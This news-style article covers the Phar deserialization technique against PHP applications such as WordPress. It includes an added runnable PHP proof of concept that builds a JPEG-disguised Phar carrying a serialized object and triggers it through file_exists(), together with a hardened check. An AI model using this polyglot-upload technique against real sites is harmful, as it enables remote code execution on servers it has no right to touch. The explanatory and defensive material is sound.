New PHP Code Execution Vulnerability Threatens WordPress Sites

New Exploit Technique Uncovered, Leaving Websites Vulnerable to PHP Deserialization Attacks

Security researcher Sam Thomas of Secarma has identified an exploitation method that raises the risk for PHP-based web applications. The technique turns functions previously deemed low-risk, such as file_exists(), into entry points for PHP object injection, so that hundreds of thousands of websites running content management systems such as WordPress and Typo3 are exposed to remote code execution.

Deserialization vulnerabilities in PHP were first documented in 2009, and until now they required attacker-controlled input to reach the unserialize() function. Thomas's findings show that an attacker can instead combine low-risk filesystem functions with PHP Archive (Phar) files to trigger deserialization without unserialize() ever being called directly. A Phar archive carries serialized metadata in its manifest, and PHP unserializes that metadata whenever a filesystem function such as fopen() or file_exists() accesses the archive through the phar:// stream wrapper.

Thomas explains that these code paths are reachable both through direct file operations and indirectly, for example through an XML External Entity (XXE) vulnerability, where the XML parser resolves an external entity that points at a phar:// URL. He presented the analysis at Black Hat USA 2018, detailing how the attack applies to WordPress sites.

In the demonstration, the attacker first plants a malicious Phar file on the target's local file system and then causes a file operation to reference it through the phar:// stream wrapper. An ordinary image upload is enough to plant the file: the stub at the start of a Phar archive is free-form as long as it ends with __HALT_COMPILER();, so an attacker can begin it with a JPEG header and the file passes as an image. WordPress's media upload feature then stores the archive on the server for the attacker.

“The thumbnail functionality within WordPress empowers an attacker with permissions to upload media to manipulate parameters in a file_exists operation, inadvertently enabling unserialization,” said Thomas. Once such an image is on the server it can be opened as a Phar archive, its metadata is deserialized, and with a suitable gadget chain in the application's own classes that leads to arbitrary code execution.
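The script below is an added, runnable illustration of the mechanism described above; it is not code from the article, from Secarma, or from WordPress. It builds a Phar whose stub starts with JPEG magic bytes and whose manifest metadata is a serialized object, renames the archive to .jpg, and then shows that a bare file_exists() on a phar:// path unserializes the metadata, beside a hardened version of the same check. The class name LogWriter, the file names under the system temp directory, and the two check functions are all assumptions made for the example; LogWriter is a benign stand-in for the gadget chain an attacker would reuse from the target's own classes. It is written for PHP 7.1 through 7.4 and needs phar.readonly=0 to create the archive.

```php
<?php
// Added example (not from the article or Secarma). Builds a Phar whose stub
// begins with JPEG magic bytes and whose manifest metadata is a serialized
// object of the hypothetical class LogWriter, then shows that a plain
// file_exists() on the phar:// wrapper unserializes that metadata.
// Run with:  php -d phar.readonly=0 phar_jpeg_demo.php
// Written for PHP 7.1 to 7.4. PHP 8.0 stopped unserializing Phar metadata on
// open, so there the trigger only fires if the application itself calls
// Phar::getMetadata().

if (ini_get('phar.readonly')) {
    fwrite(STDERR, "Re-run with: php -d phar.readonly=0 " . __FILE__ . "\n");
    exit(1);
}

const MARKER = 'phar_gadget_ran.txt';   // assumed marker file name for the demo

// Stand-in for a gadget an attacker would reuse from the target's own classes.
// __wakeup runs synchronously inside unserialize(); a __destruct gadget works
// too but fires later, when the object is released.
class LogWriter
{
    public $path;
    public $data;

    public function __wakeup()
    {
        file_put_contents($this->path, $this->data);
    }
}

function buildPharAsJpeg(string $pharPath, string $jpegPath): void
{
    @unlink($pharPath);
    $phar = new Phar($pharPath);          // name must contain ".phar" when creating
    $phar->startBuffering();
    // The stub is free-form as long as it ends with __HALT_COMPILER(); so it
    // can open with the JPEG SOI marker FF D8 FF and pass a magic-bytes check.
    $phar->setStub("\xff\xd8\xff\xe0\n<?php __HALT_COMPILER(); ?>");
    $phar->addFromString('dummy.txt', 'carrier');
    $gadget = new LogWriter();
    $gadget->path = sys_get_temp_dir() . '/' . MARKER;
    $gadget->data = 'LogWriter::__wakeup ran from phar metadata';
    $phar->setMetadata($gadget);          // serialized into the manifest
    $phar->stopBuffering();
    rename($pharPath, $jpegPath);         // the extension is irrelevant to phar://
}

// Vulnerable pattern: an attacker-influenced path reaches a stat-family call.
function vulnerableThumbnailCheck(string $path): bool
{
    return file_exists($path);            // phar:// => parse archive => unserialize
}

// Hardened pattern: refuse every stream wrapper, then confine to the upload dir.
function hardenedThumbnailCheck(string $path, string $uploadsDir): bool
{
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $path)) {
        return false;                     // phar://, php://, data://, ...
    }
    $base = realpath($uploadsDir);
    $real = realpath($uploadsDir . '/' . basename($path));
    return $base !== false && $real !== false
        && strpos($real, $base . DIRECTORY_SEPARATOR) === 0;
}

$tmp    = sys_get_temp_dir();
$marker = $tmp . '/' . MARKER;
$jpeg   = $tmp . '/avatar.jpg';

buildPharAsJpeg($tmp . '/avatar.phar', $jpeg);
@unlink($marker);

$head = bin2hex(substr(file_get_contents($jpeg), 0, 3));
printf("File starts with JPEG magic:   %s\n", $head === 'ffd8ff' ? 'yes' : 'no');

vulnerableThumbnailCheck('phar://' . $jpeg);
printf("Gadget ran via file_exists():  %s\n", file_exists($marker) ? 'yes' : 'no');

@unlink($marker);
var_dump(hardenedThumbnailCheck('phar://' . $jpeg, $tmp));
var_dump(hardenedThumbnailCheck('avatar.jpg', $tmp));
printf("Gadget ran via hardened check: %s\n", file_exists($marker) ? 'yes' : 'no');

// For applications that never need the wrapper at all, removing it closes the
// whole class of triggers in one line:
// stream_wrapper_unregister('phar');
```

The scheme check alone is not sufficient as a general fix, because the same path may later be handed to a function that accepts wrappers after some other transformation; confining the resolved path to the upload directory, and unregistering the phar wrapper where it is not needed, is what actually removes the trigger.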

Any remote authenticated user who can create or edit posts can therefore execute unauthorized PHP code on a vulnerable site. The WordPress security team acknowledged the report last year, but the patches released so far have not fully mitigated the issue. Typo3 has been more proactive, addressing the vulnerability in subsequent releases.

As these web applications continue to be used widely across various sectors, the implications of such vulnerabilities are critical for business owners to understand. This incident highlights the ever-evolving landscape of cybersecurity threats and the necessity for organizations to adopt robust security measures, ensuring that all software components are monitored and patched against emerging exploit techniques.

For further details on the vulnerability and its implications, readers are encouraged to access the full research paper published by Secarma, which delves deeper into the mechanics of these attacks and offers insights for enhanced security practices in PHP-based applications. As cyber threats become increasingly sophisticated, maintaining vigilance and implementing proactive security strategies will be imperative in safeguarding digital assets.
